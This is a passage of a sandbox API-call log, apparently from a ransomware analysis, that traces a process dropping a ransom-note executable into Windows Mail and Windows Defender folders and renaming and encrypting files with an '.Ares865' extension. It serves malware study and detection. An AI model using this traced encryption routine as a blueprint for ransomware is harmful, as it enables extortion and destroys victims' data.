ftLastWriteTime.dwLowDateTime=0x796bc150, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x60e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WinMail.exe", cAlternateFileName="")) returned 0 [0122.967] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0122.967] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b50 [0122.967] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Mail\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Mail\\en-US") returned="C:\\Program Files (x86)\\Windows Mail\\en-US" [0122.967] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df7d0 | out: hHeap=0x2b0000) returned 1 [0122.967] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0122.967] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Mail\\en-US") returned 41 [0122.967] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Windows Mail\\en-US" | out: lpString1="C:\\Program Files (x86)\\Windows Mail\\en-US") returned="C:\\Program Files (x86)\\Windows Mail\\en-US" [0122.967] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0122.967] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Windows Mail\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\windows mail\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0122.968] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0122.969] GetLastError () returned 0x0 [0122.969] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0122.969] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0122.969] CloseHandle (hObject=0x120) returned 1 [0122.969] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0122.969] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0122.969] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Windows Mail\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x52272ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52272ee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0122.969] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0122.969] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0122.970] lstrcpyW (in: lpString1=0x2cce454, lpString2="msoeres.dll.mui" | out: lpString1="msoeres.dll.mui") returned="msoeres.dll.mui" [0122.970] lstrlenW (lpString="msoeres.dll.mui") returned 15 [0122.970] lstrlenW (lpString="Ares865") returned 7 [0122.970] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0122.970] lstrlenW (lpString=".dll") returned 4 [0122.970] lstrcmpiW (lpString1="msoeres.dll.mui", lpString2=".dll") returned 1 [0122.970] lstrlenW (lpString=".lnk") returned 4 [0122.970] lstrcmpiW (lpString1="msoeres.dll.mui", lpString2=".lnk") returned 1 [0122.970] lstrlenW (lpString=".ini") returned 4 [0122.970] lstrcmpiW (lpString1="msoeres.dll.mui", lpString2=".ini") returned 1 [0122.970] lstrlenW (lpString=".sys") returned 4 [0122.970] lstrcmpiW (lpString1="msoeres.dll.mui", lpString2=".sys") returned 1 [0122.970] lstrlenW (lpString="msoeres.dll.mui") returned 15 [0122.970] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui.Ares865") returned 65 [0122.971] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui" (normalized: "c:\\program files (x86)\\windows mail\\en-us\\msoeres.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\windows mail\\en-us\\msoeres.dll.mui.ares865"), dwFlags=0x1) returned 1 [0122.972] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Mail\\en-US\\msoeres.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\windows mail\\en-us\\msoeres.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0122.972] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=518144) returned 1 [0122.972] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0122.972] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0122.972] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0122.973] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0122.973] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0122.973] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.973] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7eb00, lpName=0x0) returned 0x170 [0122.975] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7eb00) returned 0x420000 [0122.995] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0122.996] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0122.996] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.996] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0122.996] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0122.996] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0122.996] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0122.996] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0122.996] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0122.996] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0122.997] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0122.997] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0122.997] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0122.997] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0123.001] CloseHandle (hObject=0x170) returned 1 [0123.001] CloseHandle (hObject=0x118) returned 1 [0123.002] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0123.002] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0123.002] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0123.004] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd1fd1f, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe067905, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xdd1fd1f, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WinMail.exe.mui", cAlternateFileName="")) returned 1 [0123.004] lstrcmpiW (lpString1="WinMail.exe.mui", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0123.004] lstrcmpiW (lpString1="WinMail.exe.mui", lpString2="aoldtz.exe") returned 1 [0123.004] lstrcpyW (in: lpString1=0x2cce454, lpString2="WinMail.exe.mui" | out: lpString1="WinMail.exe.mui") returned="WinMail.exe.mui" [0123.004] lstrlenW (lpString="WinMail.exe.mui") returned 15 [0123.004] lstrlenW (lpString="Ares865") returned 7 [0123.004] lstrcmpiW (lpString1="exe.mui", lpString2="Ares865") returned 1 [0123.004] lstrlenW (lpString=".dll") returned 4 [0123.004] lstrcmpiW (lpString1="WinMail.exe.mui", lpString2=".dll") returned 1 [0123.004] lstrlenW (lpString=".lnk") returned 4 [0123.004] lstrcmpiW (lpString1="WinMail.exe.mui", lpString2=".lnk") returned 1 [0123.005] lstrlenW (lpString=".ini") returned 4 [0123.005] lstrcmpiW (lpString1="WinMail.exe.mui", lpString2=".ini") returned 1 [0123.005] lstrlenW (lpString=".sys") returned 4 [0123.005] lstrcmpiW (lpString1="WinMail.exe.mui", lpString2=".sys") returned 1 [0123.005] lstrlenW (lpString="WinMail.exe.mui") returned 15 [0123.005] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui.Ares865") returned 65 [0123.005] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui" (normalized: "c:\\program files (x86)\\windows mail\\en-us\\winmail.exe.mui"), lpNewFileName="C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui.Ares865" (normalized: "c:\\program files (x86)\\windows mail\\en-us\\winmail.exe.mui.ares865"), dwFlags=0x1) returned 1 [0123.007] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui.Ares865" (normalized: "c:\\program files (x86)\\windows mail\\en-us\\winmail.exe.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0123.007] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5632) returned 1 [0123.007] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0123.008] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0123.008] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0123.008] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0123.009] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0123.009] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.009] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1900, lpName=0x0) returned 0x170 [0123.011] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1900) returned 0x190000 [0123.012] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0123.012] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0123.012] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.012] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0123.013] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0123.013] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0123.013] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0123.013] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0123.013] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0123.013] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0123.013] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0123.013] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0123.013] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0123.013] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0123.013] CloseHandle (hObject=0x170) returned 1 [0123.013] CloseHandle (hObject=0x118) returned 1 [0123.013] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0123.013] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0123.013] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0123.014] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd1fd1f, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe067905, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xdd1fd1f, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WinMail.exe.mui", cAlternateFileName="")) returned 0 [0123.014] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0123.014] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b10 [0123.014] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Defender", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Defender") returned="C:\\Program Files (x86)\\Windows Defender" [0123.014] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed950 | out: hHeap=0x2b0000) returned 1 [0123.014] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0123.014] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Defender") returned 39 [0123.014] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Windows Defender" | out: lpString1="C:\\Program Files (x86)\\Windows Defender") returned="C:\\Program Files (x86)\\Windows Defender" [0123.014] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0123.014] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Windows Defender\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\windows defender\\how to back your files.exe"), bFailIfExists=1) returned 0 [0123.015] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0123.016] GetLastError () returned 0x0 [0123.016] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0123.017] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0123.017] CloseHandle (hObject=0x120) returned 1 [0123.017] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0123.017] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0123.017] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Windows Defender\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x52272ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52272ee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0123.017] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0123.017] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0123.017] lstrcpyW (in: lpString1=0x2cce450, lpString2="en-US" | out: lpString1="en-US") returned="en-US" [0123.017] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b08 [0123.017] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5c) returned 0x2f2100 [0123.017] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b10 | out: ListHead=0x2e7710, ListEntry=0x2e7b10) returned 0x2e7af0 [0123.017] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52272ee0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x52272ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0123.017] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0123.017] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcc1c145, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xdcc1c145, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x9ab7c5c0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MpAsDesc.dll", cAlternateFileName="")) returned 1 [0123.017] lstrcmpiW (lpString1="MpAsDesc.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0123.017] lstrcmpiW (lpString1="MpAsDesc.dll", lpString2="aoldtz.exe") returned 1 [0123.018] lstrcpyW (in: lpString1=0x2cce450, lpString2="MpAsDesc.dll" | out: lpString1="MpAsDesc.dll") returned="MpAsDesc.dll" [0123.018] lstrlenW (lpString="MpAsDesc.dll") returned 12 [0123.018] lstrlenW (lpString="Ares865") returned 7 [0123.018] lstrcmpiW (lpString1="esc.dll", lpString2="Ares865") returned 1 [0123.018] lstrlenW (lpString=".dll") returned 4 [0123.018] lstrcmpiW (lpString1="MpAsDesc.dll", lpString2=".dll") returned 1 [0123.018] lstrlenW (lpString=".lnk") returned 4 [0123.018] lstrcmpiW (lpString1="MpAsDesc.dll", lpString2=".lnk") returned 1 [0123.018] lstrlenW (lpString=".ini") returned 4 [0123.018] lstrcmpiW (lpString1="MpAsDesc.dll", lpString2=".ini") returned 1 [0123.018] lstrlenW (lpString=".sys") returned 4 [0123.018] lstrcmpiW (lpString1="MpAsDesc.dll", lpString2=".sys") returned 1 [0123.018] lstrlenW (lpString="MpAsDesc.dll") returned 12 [0123.018] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Defender\\MpAsDesc.dll.Ares865") returned 60 [0123.018] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Defender\\MpAsDesc.dll" (normalized: "c:\\program files (x86)\\windows defender\\mpasdesc.dll"), lpNewFileName="C:\\Program Files (x86)\\Windows Defender\\MpAsDesc.dll.Ares865" (normalized: "c:\\program files (x86)\\windows defender\\mpasdesc.dll.ares865"), dwFlags=0x1) returned 1 [0123.020] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Defender\\MpAsDesc.dll.Ares865" (normalized: "c:\\program files (x86)\\windows defender\\mpasdesc.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0123.020] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9216) returned 1 [0123.020] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0123.020] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0123.020] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0123.020] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0123.021] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0123.021] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.021] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2700, lpName=0x0) returned 0x170 [0123.023] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2700) returned 0x190000 [0123.024] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0123.025] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0123.025] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.025] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0123.025] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0123.025] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0123.025] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0123.025] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0123.025] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0123.025] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0123.025] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0123.025] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0123.025] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0123.025] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0123.026] CloseHandle (hObject=0x170) returned 1 [0123.026] CloseHandle (hObject=0x118) returned 1 [0123.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0123.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0123.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0123.026] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7732a07, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xe7732a07, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x9ab7c5c0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x5fe00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MpClient.dll", cAlternateFileName="")) returned 1 [0123.026] lstrcmpiW (lpString1="MpClient.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0123.026] lstrcmpiW (lpString1="MpClient.dll", lpString2="aoldtz.exe") returned 1 [0123.026] lstrcpyW (in: lpString1=0x2cce450, lpString2="MpClient.dll" | out: lpString1="MpClient.dll") returned="MpClient.dll" [0123.026] lstrlenW (lpString="MpClient.dll") returned 12 [0123.026] lstrlenW (lpString="Ares865") returned 7 [0123.026] lstrcmpiW (lpString1="ent.dll", lpString2="Ares865") returned 1 [0123.026] lstrlenW (lpString=".dll") returned 4 [0123.026] lstrcmpiW (lpString1="MpClient.dll", lpString2=".dll") returned 1 [0123.026] lstrlenW (lpString=".lnk") returned 4 [0123.026] lstrcmpiW (lpString1="MpClient.dll", lpString2=".lnk") returned 1 [0123.026] lstrlenW (lpString=".ini") returned 4 [0123.026] lstrcmpiW (lpString1="MpClient.dll", lpString2=".ini") returned 1 [0123.027] lstrlenW (lpString=".sys") returned 4 [0123.027] lstrcmpiW (lpString1="MpClient.dll", lpString2=".sys") returned 1 [0123.027] lstrlenW (lpString="MpClient.dll") returned 12 [0123.027] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Defender\\MpClient.dll.Ares865") returned 60 [0123.027] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Defender\\MpClient.dll" (normalized: "c:\\program files (x86)\\windows 